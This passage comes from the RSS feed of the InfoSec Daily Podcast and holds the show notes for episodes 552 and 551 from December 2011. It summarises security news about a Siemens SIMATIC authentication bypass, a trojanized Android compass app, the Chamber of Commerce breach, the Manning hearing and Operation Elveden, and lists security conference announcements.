<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://uk.ibtimes.com/articles/270736/20111221/siemens-lied-major-bugs-security-expert.htm"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://uk.ibtimes.com/articles/270736/20111221/siemens-lied-major-bugs-security-expert.htm</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Siemens has lied to the press about security bugs that could affect critical infrastructure, according to a security expert who has made public the password for Siemens&#39; machinery.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Billy Rios is a security engineer for a software company and has written on his personal blog that Siemens&#39; SIMATIC systems can be easily hacked into and controlled remotely by anyone with an internet connection.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rios claims that Siemens PR told a Reuters reporter that &quot;there are no open issues regarding authentication bypass bugs at Siemens,&quot; contrary to what Rios believes. &quot;In May of this year,&quot; he writes, &quot;I reported an authentication bypass for Siemens SIMATIC systems. These systems are used to manage Industrial Control Systems and Critical Infrastructure. I&#39;ve been patiently waiting for a fix for the issue which affects pretty much every Siemens SIMATIC customer.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://itunes.apple.com/us/app/logmein/id479229407?ls=1&amp;mt=8"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://itunes.apple.com/us/app/logmein/id479229407?ls=1&amp;mt=8</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you need remote access to your desktop from your iOS phone or tablet, now you can get there for free. Starting today, LogMeIn has a new app in the Apple App Store and it is free. </span><img height="469px;" src="https://lh3.googleusercontent.com/EiGNKKmRUtwoBoUg6suJH9gQ-phW6XBPI9aBqgbzKCDAno0gai69CIR4UIGhAldMM0PQfsp4hHNDVOze3r6KjTAiOtcl0uGqIduyZasOzM0v2lES78o" width="476px;" /><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This replaces their low-end Ignition app that they previously charged $30 for. It doesn&#39;t give you everything that the current paid app provides, such as file management and cloud storage and HD video/audio streaming. But if you just need remote access, then the free app will do quite nicely. You of course need to run the free version (or the paid version) of LogMeIn on your Windows or Mac desktop, and set up an account online with them to complete the connection. What I like about LogMeIn is how they are upstanding guys. If you put down your money in the past for Ignition, you will be grandfathered in and have the premium features forever. They are planning on an Android app next year, naturally. The Pro version is $40 a year. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.ajc.com/news/nation-world/defense-says-manning-victim-1268168.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ajc.com/news/nation-world/defense-says-manning-victim-1268168.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A seven-day hearing into the biggest national security leak in U.S. history ended Thursday with defense lawyers insisting that the accused soldier was a victim of overreaching by a military that didn&#39;t even follow its own rules for safeguarding sensitive information.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Army Pfc. Bradley Manning is escorted out of a courthouse in Fort Meade, Md., Wednesday, Dec. 21, 2011, after a military hearing that will determine if he should face court-martial for his alleged role in the WikiLeaks classified leaks case went on recess for the day. (AP Photo/Patrick Semansky)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Army Pfc. Bradley Manning, center, is escorted out of a courthouse in Fort Meade, Md., Wednesday, Dec. 21, 2011, after a military hearing that will determine if he should face court-martial for his alleged role in the WikiLeaks classified leaks case went on recess for the day. (AP Photo/Patrick Semansky)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Army Pfc. Bradley Manning, left, steps out of a security vehicle outside of a courthouse in Fort Meade, Md., Wednesday, Dec. 21, 2011, for a military hearing that will determine if he should face court-martial for his alleged role in the WikiLeaks classified leaks case. (AP Photo/Patrick Semansky)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Army Pfc. Bradley Manning, left, is escorted from a courthouse in Fort Meade, Md., Thursday, Dec. 22, 2011, after closing arguments concluded in a military hearing that will determine if he should face court-martial for his alleged role in the WikiLeaks classified leaks case. (AP Photo/Patrick Semansky)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The government argued that it had made its case for a court-martial of Pfc. Bradley Manning, a troubled young intelligence analyst who prosecutors said aided the enemy by leaking troves of documents.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lawyers for the prosecution and defense gave closing arguments in the preliminary hearing at a military base outside Washington to determine whether Manning should be tried for allegedly sending hundreds of thousands of diplomatic documents and Iraq and Afghanistan war zone field reports to the anti-secrecy website WikiLeaks.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; The presiding officer, Lt. Col. Paul Almanza, has until Jan. 16 to recommend whether the 24-year-old Crescent, Okla., native should be court-martialed.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; Speaking for more than an hour, the chief prosecutor, Capt. Ashden Fein, methodically recounted evidence supporting each of the 22 charges, illustrating his arguments with several dozen slides projected on courtroom screens.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &quot;He did this during a time of war,&quot; Fein said. Laid bare on the Internet last year were military procedures for providing air support for ground troops and procedures used to fly the injured out for medical treatment, he said. Leaked documents also included names of units, intelligence sources and methods, as well as tactics used by troops in general, including secretive special operations commando forces, he said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &quot;He wrongfully and wantonly caused the information to be published on the Internet&quot; knowing that &quot;enemies of the United States use the Internet,&quot; Fein said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; Manning was trained and trusted to provide intelligence that battlefield commanders needed, and he abused that trust while serving in Iraq from late 2009 to mid-2010, the prosecutor said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; Defense attorney David Coombs spoke for about 20 minutes and never denied his client had leaked the documents.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.softpedia.com/news/Malicious-Android-App-Spreads-Revolution-Messages-242464.shtml"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/Malicious-Android-App-Spreads-Revolution-Messages-242464.shtml</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A legitimate Islamic compass Android application was discovered by Symantec researchers to hide a mobile Trojan designed to promote revolutionary topics in the Middle East.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While the app is clean on the Android Market, those who download it from third party locations may end up with a piece of malware that sends out links to every contact in the infected phone&rsquo;s address book.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The links point to one of eighteen forums that bring tribute to</span><a href="http://en.wikipedia.org/wiki/Mohamed_Bouazizi"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Mohamed Bouaziz,</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> a Tunisian street vendor who on December 17, 2010, set himself on fire as a form of protest against local authorities. Since his act became a catalyst for the Tunisian revolution and the Arab Spring movement, websites that represent a tribute to him are meant to call the Muslim world to battle.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The rogue Android app also checks to see if the targeted mobile device is owned by someone in Bahrain and, if it is, it downloads a PDF document that represents an inquiry by the Bahrain Independent Commission of Inquiry on allegations of human rights violations.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.bloomberg.com/news/2011-12-22/cyber-attack-on-u-s-chamber-presses-congress-to-fix-web-rules.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.bloomberg.com/news/2011-12-22/cyber-attack-on-u-s-chamber-presses-congress-to-fix-web-rules.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A cyber attack on the U.S. Chamber of Commerce will intensify pressure on Congress to overhaul Web security regulations written before the existence of Facebook Inc., Twitter Inc. and Google Inc. Gmail.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Concern that computer systems for banks, power companies and Internet providers are vulnerable rose after hackers with ties to China stole confidential e-mails and documents from the chamber, the biggest U.S. business lobbying organization.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Congress and the administration have been dithering over cybersecurity for years,&rdquo; said Stewart Baker, a former assistant secretary for policy at the Homeland Security Department and a partner at the Steptoe &amp; Johnson LLP law firm in Washington. &ldquo;In that time, American companies have been robbed blind. This does underline, if any underlining is necessary, that we need a strong cybersecurity bill.&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Senate Majority Leader Harry Reid plans to take up cybersecurity legislation as early as next month to rewrite rules set after the terrorist attacks of Sept. 11, 2001. A U.S. report released last month found that China was the biggest hacker threat to American firms, and those attacks breached the networks of at least 760 companies.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The chamber breach, confirmed by the organization yesterday, shows that even House and Senate members may be vulnerable to foreign hackers, said Jessica Herrera-Flanigan, a former staff director for the House Homeland Security Committee, in an interview.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;This latest compromise should especially be of concern as the hackers potentially could have gotten hold of sensitive and strategic e-mails to and from the chamber and these officials,&rdquo; said Herrera-Flanigan, who&rsquo;s now a partner at Monument Policy Group in Washington.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.theregister.co.uk/2011/12/22/operation_elveden_police_woman_cuffed/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/12/22/operation_elveden_police_woman_cuffed/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A 52-year-old female police officer was the first cop to be arrested yesterday morning in connection with allegations of receiving illegal payments from journalists.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The unnamed suspect was questioned at an Essex police station before being bailed until a return date in April next year pending further inquiries, Scotland Yard said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">She was arrested &quot;on suspicion of misconduct in a public office and offences contrary to the Prevention of Corruption Act 1906.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&#39;s the eighth arrest under Operation Elveden &ndash; a police probe supervised by the Independent Police Complaints Commission that is linked to two other investigations.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Officers working on Operation Weeting are investigating alleged voicemail interception by people said to be working at &ndash; or on behalf of &ndash; the now-defunct News Corp-owned Sunday tabloid News of the World.</span><br />
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-552-elpdcisd-christmas-caroling-siemens-manning-logmein-free-islamic-compass-web-rule-rewrite-op-elveden/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3299/0/infosec-daily-podcast-episode-552.mp3" length="21576242" type="audio/mpeg" />
		<itunes:duration>0:44:54</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 552 for December 22, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.
	&#160;
Announcements:
No Show Tomorrow Night![...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 552 for December 22, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.
	&#160;
Announcements:
No Show Tomorrow Night! &#160;Next show will on December 27th.

	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://uk.ibtimes.com/articles/270736/20111221/siemens-lied-major-bugs-security-expert.htm
	Siemens has lied to the press about security bugs that could affect critical infrastructure, according to a security expert who has made public the password for Siemens&#39; machinery.
	Billy Rios is a security engineer for a software company and has written on his personal blog that Siemens&#39; SIMATIC systems can be easily hacked into and controlled remotely by anyone with an internet connection.
	Rios claims that Siemens PR told a Reuters reporter that &#34;there are no open issues regarding authentication bypass bugs at Siemens,&#34; contrary to what Rios believes. &#34;In May of this year,&#34; he writes, &#34;I reported an authentication bypass for Siemens SIMATIC systems. These systems are used to manage Industrial Control Systems and Critical Infrastructure. I&#39;ve been patiently waiting for a fix for the issue which affects pretty much every Siemens SIMATIC customer.&#34;
	&#8230;.
	Source: &#160;http://itunes.apple.com/us/app/logmein/id479229407?ls=1&#38;mt=8
	If you need remote access to your desktop from your iOS phone or tablet, now you can get there for free. Starting today, LogMeIn has a new app in the Apple App Store and it is free. 
	This replaces their low-end Ignition app that they previously charged $30 for. It doesn&#39;t give you everything that the current paid app provides, such as file management and cloud storage and HD video/audio streaming. But if you just need remote access, then the free app will do quite nicely. You of course need to run the free version (or the paid version) of LogMeIn on your Windows or Mac desktop, and set up an account online with them to complete the connection. What I like about LogMeIn is how they are upstanding guy[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 551 &#8211; Pentest Lessons, China Hacks Your Thermostat, Mind Control Virus, Cheap iPhones &amp; GPS Spoofing</title>
		<link>http://www.isdpodcast.com/episode-551-pentest-lessons-china-hacks-your-thermostat-mind-control-virus-cheap-iphones-gps-spoofing</link>
		<comments>http://www.isdpodcast.com/episode-551-pentest-lessons-china-hacks-your-thermostat-mind-control-virus-cheap-iphones-gps-spoofing#comments</comments>
		<pubDate>Thu, 22 Dec 2011 01:53:17 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3295</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 551 for December 21, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, and Varun Sharma. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 551 for December 21, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
